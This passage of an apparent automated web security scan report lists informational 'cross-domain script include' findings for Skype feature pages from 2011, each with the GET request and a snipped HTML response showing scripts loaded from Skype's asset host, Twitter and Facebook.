HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:30 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44389


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Conference Calls - Video Conferencing - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.567. http://www.skype.com/intl/en-us/features/allfeatures/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/facebook

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/facebook HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:25 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47255


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype and Facebook Integration - Skype</title>
   <meta name="description" content="The la
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.568. http://www.skype.com/intl/en-us/features/allfeatures/facebook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/facebook/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/facebook/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47255


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype and Facebook Integration - Skype</title>
   <meta name="description" content="The la
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.569. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/group-video-calls

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/group-video-calls HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 51336


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group Video Calling - Skype</title>
   <meta name="description" content="Make group video
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.570. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/group-video-calls/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/group-video-calls/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:32 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 51336


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group Video Calling - Skype</title>
   <meta name="description" content="Make group video
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.571. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/instant-messaging

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/instant-messaging HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:23 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44946


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Instant Messenger - Download Skype IM - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.572. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/instant-messaging/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/instant-messaging/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:32 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44946


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Instant Messenger - Download Skype IM - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.573. http://www.skype.com/intl/en-us/features/allfeatures/online-number  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/online-number

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/online-number HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47578


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Online Number - Skype</title>
   <meta name="description" content="Get a personal on
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.574. http://www.skype.com/intl/en-us/features/allfeatures/online-number/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/online-number/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/online-number/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:29 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47578


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Online Number - Skype</title>
   <meta name="description" content="Get a personal on
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.575. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/screen-sharing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/screen-sharing HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:23 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44754


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Screen Sharing - Skype Screen Sharing - Skype</title>
   <meta name="description" content
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.576. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/screen-sharing/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/screen-sharing/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:32 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44754


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Screen Sharing - Skype Screen Sharing - Skype</title>
   <meta name="description" content
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.577. http://www.skype.com/intl/en-us/features/allfeatures/send-files  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/send-files

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/send-files HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:24 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42611


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>File Sharing - Send Files - Skype</title>
   <meta name="description" content="Send files
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.578. http://www.skype.com/intl/en-us/features/allfeatures/send-files/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/send-files/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/send-files/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:33 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42611


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>File Sharing - Send Files - Skype</title>
   <meta name="description" content="Send files
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.579. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-to-go-number

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/skype-to-go-number HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:21 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 69009


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype To Go - Skype Number - Skype</title>
   <meta name="description" content="Skype to
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.580. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-to-go-number/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/skype-to-go-number/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:30 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 69009


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype To Go - Skype Number - Skype</title>
   <meta name="description" content="Skype to
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.581. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-to-skype-calls

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/skype-to-skype-calls HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:19 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46024


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype to Skype Calls - Free International Calls - Skype</title>
   <meta name="description
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.582. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-to-skype-calls/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/skype-to-skype-calls/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46024


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype to Skype Calls - Free International Calls - Skype</title>
   <meta name="description
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.583. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-wifi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/skype-wifi HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:28 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60142


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="de
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
